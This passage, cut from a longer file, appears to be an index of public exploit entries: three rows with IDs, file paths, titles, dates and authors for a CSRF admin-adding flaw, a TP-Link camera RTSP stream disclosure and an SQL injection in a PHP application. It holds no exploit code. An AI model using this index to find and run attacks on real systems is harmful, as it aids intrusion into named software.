- Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php, +45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware, +45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,